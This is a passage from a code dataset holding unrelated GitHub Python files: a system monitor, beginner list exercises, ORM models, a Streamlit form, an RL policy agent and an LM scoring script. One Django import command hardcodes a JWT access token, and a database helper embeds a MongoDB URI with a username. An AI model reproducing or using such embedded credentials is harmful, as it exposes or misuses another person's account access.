That means the\n# total stat line will have incremented by 8 seconds.\n_CPU_COUNT = multiprocessing.cpu_count()\nCPU_STAT_MIN_TIME = 1000 * _CPU_COUNT\nCPU_STAT_MAX_TIME = 5000 * _CPU_COUNT\n\n\ndef main():\n _validate_os()\n mem_usage = get_memory_usage()\n cpu_usage = get_cpu_usage()\n\n print(\"Mem: {}, CPU: {}\".format(\n '--' if mem_usage is None else str(mem_usage) + '%',\n '--' if cpu_usage is None else str(cpu_usage) + '%'))\n\n\n########################\n# Validation Functions #\n########################\n\n\ndef _validate_os():\n if not (jnsos.is_linux() or jnsos.is_cygwin()):\n raise OSError('Unsupported operating system: {}. Only Linux and Cygwin are supported.')\n\n\n##########################\n# Memory Usage Functions #\n##########################\n\n\ndef get_memory_usage():\n mem_total, mem_available = _read_meminfo()\n usage = None\n\n if mem_total and mem_available:\n usage = (mem_total - mem_available) / mem_total * 100\n\n return round(usage) if usage is not None else None\n\n\ndef _read_meminfo():\n mem_total = None\n mem_available = None # This is not available in Cygwin, so we have to use MemFree instead\n mem_free = None\n\n with open(PROC_MEM_FILE, 'r') as f:\n line = f.readline()\n\n while (mem_total is None or mem_available is None or mem_free is None) and line:\n if line.startswith('MemTotal:'):\n mem_total = int(line.split()[1])\n elif line.startswith('MemAvailable:'):\n mem_available = int(line.split()[1])\n elif line.startswith('MemFree:'):\n mem_free = int(line.split()[1])\n\n line = f.readline()\n\n if not mem_available:\n mem_available = mem_free\n\n return mem_total, mem_available\n\n\n#######################\n# CPU Usage Functions #\n#######################\n\n\ndef get_cpu_usage():\n raw_stat_old = _read_cpu_stat(os.path.join(SYSMONITOR_CONFIG_DIR, OLD_CPU_STAT_FILE))\n raw_stat_new = _read_cpu_stat(PROC_CPU_FILE)\n cpu_info_old = _get_cpu_info(raw_stat_old)\n cpu_info_new = _get_cpu_info(raw_stat_new)\n usage = None\n\n # If there is no old CPU stat reading, create one\n if raw_stat_old is None:\n _write_last_cpu_stat(raw_stat_new)\n\n # If there is not enough information to calculate the CPU usage. 
This can happen if the old CPU info file is empty.\n # The old file can end up empty sometimes if the terminal is closed while this program is running.\n elif not _can_calculate_cpu_usage(cpu_info_old, cpu_info_new):\n _write_last_cpu_stat(raw_stat_new)\n\n # If we have all the information needed to calculate the CPU usage\n else:\n delta_total = abs(cpu_info_new.total - cpu_info_old.total)\n\n # Too little time has passed between readings\n if delta_total < CPU_STAT_MIN_TIME:\n usage = _read_last_cpu_usage()\n # Too much time has passed between readings\n elif delta_total > CPU_STAT_MAX_TIME:\n _write_last_cpu_stat(raw_stat_new)\n # An acceptable amount of time has passed between readings\n else:\n delta_idle = cpu_info_new.idle - cpu_info_old.idle\n usage = (delta_total - delta_idle) / delta_total * 100\n\n _write_last_cpu_usage(usage)\n _write_last_cpu_stat(raw_stat_new)\n\n return round(usage) if usage is not None else None\n\n\ndef _can_calculate_cpu_usage(cpu_info_old, cpu_info_new):\n return (cpu_info_old and\n cpu_info_old.idle and\n cpu_info_old.total and\n cpu_info_new and\n cpu_info_new.idle and\n cpu_info_new.total)\n\n\ndef _read_cpu_stat(stat_file):\n stat = None\n\n if os.path.exists(stat_file):\n with open(stat_file, 'r') as f:\n stat = f.read()\n\n return stat\n\n\ndef _write_last_cpu_stat(cpu_stat):\n _make_config_dir()\n with open(os.path.join(SYSMONITOR_CONFIG_DIR, OLD_CPU_STAT_FILE), 'w') as f:\n f.write(cpu_stat)\n\n\ndef _get_cpu_info(cpu_stat):\n cpu_info = None\n\n if cpu_stat:\n lines_it = iter(cpu_stat.splitlines())\n line = next(lines_it, None)\n\n while cpu_info is None and line:\n if line.startswith('cpu '):\n cpu_info = _read_cpu_stat_line(line)\n\n line = next(lines_it, None)\n\n return cpu_info\n\n\ndef _read_cpu_stat_line(line):\n parts = line.split()\n\n user, system, nice, idle = parts[1:5]\n\n if jnsos.is_linux():\n wait, irq, srq, zero = parts[5:9]\n else:\n wait, irq, srq, zero = [0, 0, 0, 0]\n\n return CPUInfo(\n user=int(user),\n system=int(system),\n nice=int(nice),\n idle=int(idle),\n wait=int(wait),\n irq=int(irq),\n srq=int(srq),\n zero=int(zero))\n\n\ndef _read_last_cpu_usage():\n usage = None\n usage_file = os.path.join(SYSMONITOR_CONFIG_DIR, OLD_CPU_USAGE_FILE)\n\n if os.path.exists(usage_file):\n with open(usage_file, 'r') as f:\n try:\n usage = float(f.readline())\n except ValueError:\n usage = None\n\n return usage\n\n\ndef _write_last_cpu_usage(usage):\n _make_config_dir()\n\n with open(os.path.join(SYSMONITOR_CONFIG_DIR, OLD_CPU_USAGE_FILE), 'w') as f:\n f.write(str(usage))\n\n#####################\n# Utility Functions #\n#####################\n\n\ndef _make_config_dir():\n if not os.path.isdir(SYSMONITOR_CONFIG_DIR):\n os.makedirs(SYSMONITOR_CONFIG_DIR)\n\n\n###########\n# Classes #\n###########\n\n\nclass CPUInfo:\n def __init__(self, user, system, nice, idle, wait, irq, srq, zero):\n self.user = user\n self.system = system\n self.nice = nice\n self.idle = idle\n self.wait = wait\n self.irq = irq\n self.srq = srq\n self.zero = zero\n self.total = user + system + nice + idle + wait + irq + srq + zero\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"eviljoe/junk-n-stuff","sub_path":"src/sysmonitor.py","file_name":"sysmonitor.py","file_ext":"py","file_size_in_byte":6937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5166794265","text":"# -*- coding: utf-8 -*-\n\n\nimport os\nimport operator\nimport rtlib.tfile\nimport ulib.tools.fmt\nimport ulib.validators.fs\n\nfrom 
slib import widgetlib\nfrom slib import html\n\n\n##### Public methods #####\n@widgetlib.provides(\"torrents_table\", \"torrents_count\", \"torrents_size\")\n@widgetlib.required(css_list=(\"simple_table.css\",))\ndef torrentsList(torrents_dir_path, link_prefix) :\n\ttorrents_dir_path = ulib.validators.fs.validAccessiblePath(torrents_dir_path)\n\tlink_prefix = os.path.normpath(link_prefix)\n\n\tsize = 0\n\trows_list = []\n\tfor (torrent_file_name, torrent) in sorted(rtlib.tfile.torrents(torrents_dir_path).items(), key=operator.itemgetter(0)) :\n\t\ttorrent_size = torrent.size()\n\t\tsize += torrent_size\n\t\trows_list.append([\n\t\t\t\tstr(len(rows_list) + 1),\n\t\t\t\t# NOTE: the anchor markup below was lost in extraction; the \"<a href=...>\" form is an assumed reconstruction\n\t\t\t\t\"<a href='%s'>%s</a>\" % (os.path.join(link_prefix, torrent_file_name), torrent_file_name),\n\t\t\t\tulib.tools.fmt.formatSize(torrent_size),\n\t\t\t\thtml.maybeLink(torrent.comment() or \"\"),\n\t\t\t])\n\ttorrents_table = html.tableWithHeader([\"N\", \"Name\", \"Size\", \"Comment\"], rows_list)\n\n\treturn (torrents_table, str(len(rows_list)), ulib.tools.fmt.formatSize(size))\n\n","repo_name":"mdevaev/slib","sub_path":"slib/widgets/torrents.py","file_name":"torrents.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27949165377","text":"\"\"\"Write a program that takes a list of athletes from the command-line arguments and then prints the first three.\n\nUsage example:\n> python program.py Ильин Петров Зинько Сидоров Васильев Литвинов\n> ['Ильин', 'Петров', 'Зинько']\n \"\"\"\n\nimport sys\nsportmen = sys.argv\nprint(sportmen[1:4])\n\n\n'''The last three\n\nWrite a program that takes a list of athletes from the command-line arguments and then prints the last three.\n\nUsage example:\n> python program.py Ильин Петров Зинько Сидоров Васильев Литвинов\n> ['Сидоров', 'Васильев', 'Литвинов']\n '''\n\nimport sys\nathletes = sys.argv[1:]\nprint(athletes[-3:])\n\n\n\n'''A new top three\n\nWrite a program that takes a list of three athletes from the command-line arguments and then replaces the first three in the athletes list with the new values.\n\nUsage example:\n> python program.py Зидан Анри Пети\n> ['Зидан', 'Анри', 'Пети', 'Зинько', 'Сидоров', 'Васильев', 'Литвинов']\n '''\n\nimport sys\nnew_athletes = sys.argv[1:4]\n\nathletes = ['Иванов', 'Ильин', 'Петров', 'Зинько', 'Сидоров', 'Васильев', 'Литвинов']\nathletes[:3] = new_athletes\nprint(athletes)\n\n'''Fixing a mistake\n\nThe program below should take a new car model from the command-line arguments and append it to the end of the cars list. But something went wrong while it was being written, and the car is not added. Fix the error.\nUsage example:\n> python program.py Lada\n> ['BMW', 'Audi', 'Toyota', 'Mazda', 'Lada']'''\n\n\nimport sys\n\nnew_car = str(sys.argv[1])\nnew_car = [new_car]\ncars = ['BMW', 'Audi', 'Toyota', 'Mazda']\ncars += new_car\nprint(cars)\n\n\n\"\"\"Disqualification\n\nThe athletes variable stores a list of athletes. The competition organizers decided to disqualify one of the participants. Write a program that takes an athlete's index from the command-line arguments, removes that athlete from the list, and then prints the remaining list.\n\nUsage example:\n> python program.py 0\n> ['Ильин', 'Петров', 'Зинько', 'Сидоров', 'Васильев', 'Литвинов']\"\"\"\n\nimport sys\nindex = int(sys.argv[1])\nathletes = ['Иванов', 'Ильин', 'Петров', 'Зинько', 'Сидоров', 'Васильев', 'Литвинов']\ndel athletes[index]\nprint(athletes)\n\n\"\"\"Population\n\nThe editor below contains the population list, which stores the population of Russia from 2003 through 2020 inclusive. The data is ordered by year.\n\nWrite a program that takes two values from the command-line arguments, a start year and an end year, and then prints a list with the number of people in that period (including the last year passed in).\n\nThat is, if the program receives the years 2004 and 2006, it must print the data for 2004, 2005 and 2006.\nUsage example:\n> python program.py 2004 2006\n> [144168205, 143474219, 142753551]\"\"\"\n\nimport sys\nyear_start, year_end = int(sys.argv[1]), int(sys.argv[2])\n\npopulation = [\n    144_963_650,  # 2003\n    144_168_205,\n    143_474_219,\n    142_753_551,\n    142_220_968,\n    142_008_838,\n    141_903_979,\n    142_856_536,\n    142_865_433,\n    143_056_383,\n    143_347_059,\n    143_666_931,\n    146_267_288,\n    146_544_710,\n    146_804_372,\n    146_880_432,\n    146_780_720,\n    146_748_590  # 2020\n]\n\nprint(population[year_start-2003:year_end-2003+1])\n\n\n\n\n\n\n","repo_name":"maxelame/PYTHON","sub_path":"Shultais_Education/4_Features_of_slices_in_lists.py","file_name":"4_Features_of_slices_in_lists.py","file_ext":"py","file_size_in_byte":4756,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15637621867","text":"from sqlalchemy import Column, Integer, String\n\nfrom DataLayer.DAL import Base, DAL\nfrom domain.main.Utils.ConcurrentDictionary import ConcurrentDictionary\nfrom src.domain.main.Utils.Logger import report\nfrom src.domain.main.Utils.Response import Response\n\n\n\n\nclass OwnersApproval(Base):\n    __tablename__ = 'owner_approvals'\n    __table_args__ = {'extend_existing': True}\n    approval_id = Column(\"approval_id\", Integer, primary_key=True)\n    store_name = Column(\"store_name\", String, default='')\n    person_to_approve = Column(\"person_to_approve\", String, default='')\n    starter = Column(\"starter\", String, default='')\n    to_approve_str = Column(\"purchase_history_str\", String, default='')\n\n    def __init__(self, approval_id, l: list, sender:str, store_name=\"\", person_to_approve=\"\"):\n        self.approval_id = approval_id\n        self.store_name = store_name\n        self.person_to_approve = person_to_approve\n        self.to_approve = {}\n        self.starter = sender\n        self.to_approve_str = ''\n        for person in l:\n            if person == sender:\n                self.to_approve[sender] = True\n                self.to_approve_str += f'{person}:1,'\n            else:\n                self.to_approve[person] = False\n                self.to_approve_str += f'{person}:0,'\n\n    def remove_owner(self, person: str):\n        self.to_approve.pop(person)\n        names_list = self.to_approve_str.split(',')\n        updated_list = [item for item in names_list if not item.startswith(person)]\n        self.to_approve_str = ','.join(updated_list)\n        DAL.update(self)\n\n    def add_owner(self, person: str):\n        self.to_approve[person] = False\n        self.to_approve_str += f'{person}:0'\n\n    def approve(self, person: str) -> Response:\n        self.to_approve[person] = True\n        names_list = self.to_approve_str.split(',')\n        updated_list = []\n        for item in names_list:\n            if len(item) > 2:\n                name, value = item.split(':')\n                if 
name == person:\n                    item = f\"{name}:1\"\n                updated_list.append(item)\n        self.to_approve_str = ','.join(updated_list)\n\n        res = self.is_approved()\n        if not res.result:\n            return res\n        return report(f\"{person} approved bid\", True)\n\n    def is_approved(self) -> Response[bool]:\n        for p in self.to_approve:\n            if not self.to_approve[p]:\n                return report(f\"is_approved {p} not approved yet\", False)\n\n        return report(\"approved\", True)\n\n    def restore(self):\n        for p in self.to_approve:\n            self.to_approve[p] = False\n        self.to_approve_str.replace(\":1\", \":0\")\n        DAL.update(self)\n\n    def left_to_approve(self) -> list[str]:\n        l = []\n        for p in self.to_approve:\n            if not self.to_approve[p]:\n                l.append(p)\n        return l\n\n    @staticmethod\n    def create_instance_from_db_query(r):\n        approval_id, store_name, person_to_approve, starter, to_approve_str = \\\n            r.approval_id, r.store_name, r.person_to_approve, r.starter, r.to_approve_str\n\n        names_list = to_approve_str.split(',')\n        parsed_dict = {}\n        for item in names_list:\n            if len(item) > 2:\n                name, value = item.split(':')\n                parsed_dict[name] = bool(int(value))\n\n        approval = OwnersApproval(approval_id, [], starter, store_name, person_to_approve)\n        approval.to_approve = parsed_dict\n        approval.to_approve_str = to_approve_str\n        return approval\n\n    @staticmethod\n    def load_all_approvals_for_owners(store_name):\n        out = ConcurrentDictionary()\n        for a in DAL.load_all_by(OwnersApproval, lambda r: r.store_name == store_name, OwnersApproval.create_instance_from_db_query):\n            out.insert(a.person_to_approve, a)\n        return out\n\n\n    @staticmethod\n    def add_record(approval):\n        DAL.add(approval)\n\n    @staticmethod\n    def delete_record(approval_id):\n        DAL.delete(OwnersApproval, lambda r: r.approval_id == approval_id)\n\n    @staticmethod\n    def clear_db():\n        DAL.clear(OwnersApproval)","repo_name":"BatelBB/Workshop-on-Software-Engineering-Project","sub_path":"src/domain/main/Utils/OwnersApproval.py","file_name":"OwnersApproval.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42939741830","text":"from pymongo import MongoClient\n\n\nclass nlpDB:\n    def __init__(self):\n        try:\n            self.client = MongoClient(\"mongodb+srv://saif_test1:@cluster1.yqruc.mongodb.net/myFirstDatabase?retryWrites=true&w=majority\")\n            #self.client = MongoClient(\"mongodb+srv://saif_test1:@cluster1.yqruc.mongodb.net/test\")\n            self.db = self.client.get_database('myFirstDatabase')\n            self.records = self.db['nlp_records']\n        except Exception as e:\n            print(e)\n\n\n    # To add new row\n    def updateDataBase(self, essay, essay_set, result):\n        row = {}\n        row['essay_token_pad'] = essay\n        row['essay_set'] = essay_set\n        # row['sent_count'] = sent_count\n        # row['word_count'] = word_count\n        row['result'] = result\n        self.records.insert_one(row)","repo_name":"mdsaifk/Auto-essay-grading","sub_path":"src/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15385864766","text":"import streamlit as st\nimport requests\nimport pandas as pd\nimport pickle\n\n\ndef app():\n    st.title('Below please enter the details')\n    df=pd.read_csv('data_schema.csv')\n    st.subheader('Go to the info page where you can find the details which are required to fill in')\n    requried_columns=list(df.loc[df['requried']==True,'name'].values)\n    data={}\n    with open('encoders.pkl','rb') as f:\n        encoders=pickle.load(f)\n    for 
col,encoder in encoders.items():\n enter=st.selectbox(f\"select value for {col}\",list(encoder.classes_))\n if enter:\n if col=='primary_use':\n data[col]=enter\n else:\n data[col]=int(enter)\n else:\n if col=='primary_use':\n data[col]=str(list(encoder.classes_)[0])\n else:\n data[col]=int(list(encoder.classes_)[0])\n categorical_columns=list(encoders.keys())\n numerical_columns=list(col for col in df['name'].values if col not in categorical_columns)\n for col in numerical_columns:\n enter=st.text_input(f'fill the value of {col}')\n if enter:\n try:\n requried_dtype=df.loc[df['name']==col,'dtype'].values[0]\n if requried_dtype=='float':\n data[col]=float(enter)\n elif requried_dtype=='int':\n data[col]=int(enter)\n except:\n st.error(f\"enter correct dtype\")\n if st.button('submit'):\n count=0\n for col in requried_columns:\n if data[col]==None:\n st.error(f\"{col} is not filled\")\n count+=1\n if count == 0:\n with st.spinner(text='In progress'):\n response=requests.post('http://fastapi:8000/predict',json=data).json()\n reading=response['meter_reading']\n if reading<0:\n reading=0\n st.success(f\"meter reading is {reading} kWh\")","repo_name":"RavitejaBadugu/ashare","sub_path":"deployment/streamlit/uploads.py","file_name":"uploads.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37143986349","text":"import Exobjects\nimport GMeshTools\n\n# create empty background grid\nlimits = [[-2.0,2.0], [-0.75,0.75], [-0.1,0.1]]\nsize = 0.1\ngmesh = GMeshTools.GMesh(limits, size)\n\n# construct geometry on background grid\n\nbody = GMeshTools.Body()\n\nsurf1 = GMeshTools.Boundary()\nsurf2 = GMeshTools.Boundary()\n\n# brick\nx = 2.8\ny = 1.2\nz = 0.1\nbrick = GMeshTools.Brick(x, y, z)\nbody.Add(brick)\n\n# add cylinder ends\nheight = 0.1\nradius = 0.6\nposition = [1.4, 0.0, 0.0]\ncylinder = GMeshTools.Cylinder(height, radius, position)\nbody.Add(cylinder)\n\nposition = [-1.4, 0.0, 0.0]\ncylinder = GMeshTools.Cylinder(height, radius, position)\nbody.Add(cylinder)\n\n# subtract bolt holes\nradius = 0.3575\nposition = [1.4, 0.0, 0.0]\ncylinder = GMeshTools.Cylinder(height, radius, position)\nbody.Subtract(cylinder)\n\nsurf1.Add(cylinder.wall)\n\nposition = [-1.4, 0.0, 0.0]\ncylinder = GMeshTools.Cylinder(height, radius, position)\nbody.Subtract(cylinder)\n\nsurf2.Add(cylinder.wall)\n\ngmesh.ImprintBody(body)\ngmesh.CreateBoundary(surf1,100)\ngmesh.CreateBoundary(surf2,200)\n\n\ngmesh.write(\"coupon.gen\")\n","repo_name":"dolanjp/Albany_3DM_Master","sub_path":"tests/small/ATO/Cogent_Tab/coupon.py","file_name":"coupon.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"13117565235","text":"# ace/ace_system.py\nfrom .bus import Bus\nfrom .l1_aspirational import L1AspirationalLayer\nfrom .l3_agent import L3AgentLayer\n\n\nclass AceSystem:\n def __init__(self, llm, model):\n self.northbound_bus = Bus('northbound')\n self.southbound_bus = Bus('southbound')\n\n self.l1_aspirational_layer = L1AspirationalLayer(\n llm,\n model,\n self.southbound_bus,\n self.northbound_bus\n )\n\n self.l3_agent = L3AgentLayer(\n llm,\n model,\n self.southbound_bus,\n self.northbound_bus\n )\n\n self.layers = [\n self.l1_aspirational_layer,\n self.l3_agent\n ]\n\n def get_layers(self):\n return self.layers\n\n def start(self):\n 
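# Presumably only the aspirational layer needs to listen northbound here;\n        # the L3 agent publishes on the northbound bus and receives guidance southbound.\n        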
self.northbound_bus.subscribe(self.l1_aspirational_layer.on_northbound_message)\n","repo_name":"OriginalGrubbsy/ACE_Framework","sub_path":"demos/stacey/backend/ace/ace_system.py","file_name":"ace_system.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"69829802667","text":"import torch\nimport torch.nn.functional as F\nfrom torch.distributions import Normal\nimport numpy as np\nfrom utils import discount_rewards\n\n\nclass Policy(torch.nn.Module):\n def __init__(self, state_space, action_space):\n super().__init__()\n self.state_space = state_space\n self.action_space = action_space\n self.hidden = 64\n self.fc1 = torch.nn.Linear(state_space, self.hidden)\n self.fc2_mean = torch.nn.Linear(self.hidden, action_space)\n\n # Task 1a, 1b, 1c\n # self.sigma = torch.Tensor([5.0])\n\n # Task 2a\n # self.initial_sigma = torch.Tensor([10.0])\n # self.sigma = torch.Tensor([10.0])\n\n # Task 2b\n self.sigma = torch.nn.Parameter(torch.Tensor([10.0]))\n self.init_weights()\n\n def init_weights(self):\n for m in self.modules():\n if type(m) is torch.nn.Linear:\n torch.nn.init.normal_(m.weight)\n torch.nn.init.zeros_(m.bias)\n\n def forward(self, x):\n x = self.fc1(x)\n x = F.relu(x)\n action_mean = self.fc2_mean(x)\n sigma = torch.sqrt(self.sigma) # DONE: Is it a good idea to leave it like this?\n\n # DONE: Instantiate and return a normal distribution\n # with mean mu and std of sigma (T1)\n action_dist = Normal(loc=action_mean, scale=sigma)\n\n return action_dist\n\n def update_sigma_exponentially(self, episode_number):\n c = 0.0005\n self.sigma = self.initial_sigma * np.exp(-c * episode_number)\n\n\nclass Agent(object):\n def __init__(self, policy):\n self.train_device = \"cpu\"\n self.policy = policy.to(self.train_device)\n self.optimizer = torch.optim.Adam(policy.parameters(), lr=5e-3)\n self.gamma = 0.98\n self.states = []\n self.action_probs = []\n self.rewards = []\n\n def episode_finished(self, episode_number):\n # Task 2a: update sigma of the policy exponentially decreasingly.\n # self.policy.update_sigma_exponentially(episode_number + 1)\n\n action_probs = torch.stack(self.action_probs, dim=0) \\\n .to(self.train_device).squeeze(-1)\n rewards = torch.stack(self.rewards, dim=0).to(self.train_device).squeeze(-1)\n self.states, self.action_probs, self.rewards = [], [], []\n\n # DONE: Compute discounted rewards (use the discount_rewards function)\n discounted_rewards = discount_rewards(rewards, self.gamma)\n\n # Task 1c\n discounted_rewards -= torch.mean(discounted_rewards)\n discounted_rewards /= torch.std(discounted_rewards)\n\n # DONE: Compute the optimization term (T1)\n # task 1a\n baseline = 0\n # task 1b\n # baseline = 20\n\n weighted_probs = -action_probs * (discounted_rewards - baseline)\n\n # DONE: Compute the gradients of loss w.r.t. 
network parameters (T1)\n loss = torch.mean(weighted_probs)\n loss.backward()\n\n # DONE: Update network parameters using self.optimizer and zero gradients (T1)\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n def get_action(self, observation, evaluation=False):\n x = torch.from_numpy(observation).float().to(self.train_device)\n\n # DONE: Pass state x through the policy network (T1)\n aprob = self.policy.forward(x)\n\n # DONE: Return mean if evaluation, else sample from the distribution\n # returned by the policy (T1)\n if evaluation:\n action = aprob.mean\n else:\n action = aprob.sample()\n\n # DONE: Calculate the log probability of the action (T1)\n act_log_prob = aprob.log_prob(action)\n\n return action, act_log_prob\n\n def store_outcome(self, observation, action_prob, action_taken, reward):\n self.states.append(observation)\n self.action_probs.append(action_prob)\n self.rewards.append(torch.Tensor([reward]))\n","repo_name":"CristianAbrante/reinforcement-learning-exercises","sub_path":"exercise-5/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4931677351","text":"from django.core.management.base import BaseCommand, CommandParser\nfrom typing import Optional, TypedDict\nfrom starrydata.models import Tag, Node, Term\nimport requests, re, json\n\n# FIX: モデル変更したので修正する必要あり\nclass Command(BaseCommand):\n Tree = TypedDict('Tree', {'id': str, 'modified': int, 'text': str, 'children': Optional[list['Tree']]})\n help = 'Import Initial Data to Database'\n\n def add_arguments(self, parser: CommandParser) -> None:\n parser.add_argument('--docId', type=str)\n\n def handle(self, *args, **options):\n payload = {'docId': options['docId']}\n headers = {\n 'Jwt-Token': 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJhcHAiOiJ0cmFuc25vIiwic3ViIjoiMTA4MjU0MDkiLCJsb2dpblR5cGUiOiJlbWFpbCIsImV4cCI6MTYyNjU4MzQ2OCwiaWF0IjoxNjIzOTkxNDY4fQ.ErmJOBrQ22yfgpyMgzMNU4OX-IjOGwzMsWlFb_Nu4PfL9A9KNKD0nMP0dStq5reX7e5PcxJrLTxUcKJ4ID1djw',\n 'Content-Type': 'application/json;charset=UTF-8',\n 'Accept': 'application/json'\n }\n r = requests.post('https://api.transno.com/v3/api/document/view/get', data=json.dumps(payload), headers=headers)\n rootName = r.json()['data']['name']\n # transnoのAPIのレスポンスにspanタグが含まれるため除去\n tree = json.loads(re.sub('','',r.json()['data']['definition']))['nodes']\n\n rootTerm = Term.objects.filter(name=rootName)\n if not rootTerm.exists():\n term = Term(name=rootName, language='jp')\n term.save()\n print('ルート単語生成:「' + rootName + '」')\n\n rootTag = Tag.objects.filter(term_ja__name=rootName)\n if not rootTag.exists():\n tag = Tag(term_ja=rootTerm[0])\n tag.save()\n print('ルートタグ生成:「' + rootName + '」')\n\n rootNode = Node.objects.filter(tag__term_ja=rootTerm[0]).values('id')\n if not rootNode.exists():\n node = Node(tag=rootTag[0])\n node.save()\n print('ルートノード生成「' + rootName + '」')\n\n list(map(lambda parent: self.__importTree(rootNode[0]['id'], parent), tree))\n\n def __importTree(self, parent_id: int, tree: Tree):\n print('処理開始:「' + tree['text'] + '」')\n parent = Node.objects.get(pk=parent_id)\n\n tag = Tag.objects.filter(term_ja__name=tree['text'])\n\n if tree['text'] == '':\n print('処理不要:タグ名が付いていないため')\n pass\n\n if tag.exists():\n node = Node.objects.filter(tag=tag[0], parent=parent)\n if node.exists():\n print('処理不要:タグもノードも存在するため')\n else:\n newNode = Node(tag=tag[0],parent=parent)\n newNode.save()\n print('新規ノード生成 - 親:「' + parent.tag.term_ja.name + '」')\n else:\n 
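# Neither the term nor its tag exists yet: create the Term first, then a Tag pointing at it, then hang a Node for that tag under the current parent.\n            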
newTerm = Term(name=tree['text'], language='jp')\n            newTerm.save()\n            print('新規単語生成:「' + newTerm.name + '」')\n            newTag = Tag(term_ja=newTerm)\n            newTag.save()\n            print('新規タグ生成:「' + newTag.term_ja.name + '」')\n            # use the tag just created; tag[0] would raise on the empty queryset here\n            newNode = Node(tag=newTag, parent=parent)\n            newNode.save()\n            print('新規ノード生成 - 親:「' + parent.tag.term_ja.name + '」')\n        print('')\n\n        # re-resolve the tag by name so this works on both the if and else paths\n        node = Node.objects.get(tag__term_ja__name=tree['text'], parent=parent)\n        if 'children' in tree:\n            list(map(lambda child: self.__importTree(node.pk, child), tree['children']))\n        pass\n","repo_name":"t29mato/tag-tree-api","sub_path":"starrydata/management/commands/import_transno_data.py","file_name":"import_transno_data.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"71989826346","text":"\"\"\"\nAssign a loglikelihood score to a sentence and then add the log posterior probability to get the score\nThen subtract the log prior prob of an event\n\"\"\"\n\nfrom lm_scorer.models.auto import AutoLMScorer as LMScorer\nimport json\nimport torch\nfrom visual_heatmap import ConfusionMatrixHeatMap\n\nclass GetLoglikelihood():\n    def __init__(self, scenario=\"library\"):\n        self.scenario = scenario\n        self.data_path = \"/home/CE/skrjanec/data_seg_all_code/\" + self.scenario + \"/join/train_val_line.json\"\n\n        # initialize the LM scorer\n        self.init_LM_scorer()\n        self.lm_ll = []\n\n        # read the data json\n        # '{\"gold_event\": \"5\", \"segment\": \"he then scanned my card ,\"}'\n        self.gold_labels = []\n        with open(self.data_path, \"r\") as f:\n            print(\"... reading in the segments\")\n            for line in f:\n                if line:\n                    segment = json.loads(line)[\"segment\"] # str\n                    self.lm_ll.append(self.scorer.sentence_score(segment, log=True)) # log probability of sentence; float\n                    self.gold_labels.append(int(json.loads(line)[\"gold_event\"])) # str\n\n        self.gold_labels = torch.tensor(self.gold_labels)\n\n        self.lm_ll = torch.tensor(self.lm_ll)\n        print(\"number of segments\", self.lm_ll.shape)\n        self.lm_ll = self.lm_ll.to(\"cpu\")\n\n        # get prior probabilities of events from a file\n        self.read_priors()\n        print(\"priors\", self.priors)\n        self.priors = self.priors.to(\"cpu\")\n\n        self.read_posteriors()\n        print(\"posteriors\", self.posteriors)\n        self.posteriors = self.posteriors.to(\"cpu\")\n\n        # sum and subtract\n        self.data_likelihood = self.posteriors.detach().clone()\n        self.data_likelihood = self.data_likelihood.to(\"cpu\")\n\n        for i in range(self.data_likelihood.shape[1]):\n            self.data_likelihood[:, i] += self.lm_ll\n\n        for j in range(self.data_likelihood.shape[0]):\n            self.data_likelihood[j, :] -= self.priors\n\n\n        #self.visualize()\n\n        # check which event makes a segment more likely\n        # take argmax for each row = each segment\n        max_LL = torch.argmax(self.data_likelihood, dim=1)\n        accuracy = 100 * torch.sum(max_LL == self.gold_labels).item() / self.data_likelihood.shape[0]\n        print(\"ACCURACY\", accuracy)\n\n    def read_posteriors(self):\n        tpath = \"/home/CE/skrjanec/data_seg_all_code/word_language_model_iza/classifier/inscript_lm/logsoftmax_p_e_given_x.pt\" # path to tensor\n        self.posteriors = torch.load(tpath)\n        print(\"Posterior logp tensor\", self.posteriors)\n\n    def init_LM_scorer(self):\n        device = \"cuda:1\"\n        batch_size = 1\n        self.scorer = LMScorer.from_pretrained(\"gpt2\", device=device, batch_size=batch_size)\n\n        # scorer.sentence_score([s1, s2...], log=True)\n\n    def read_priors(self):\n        fpath = \"/home/CE/skrjanec/data_seg_all_code/\" + self.scenario 
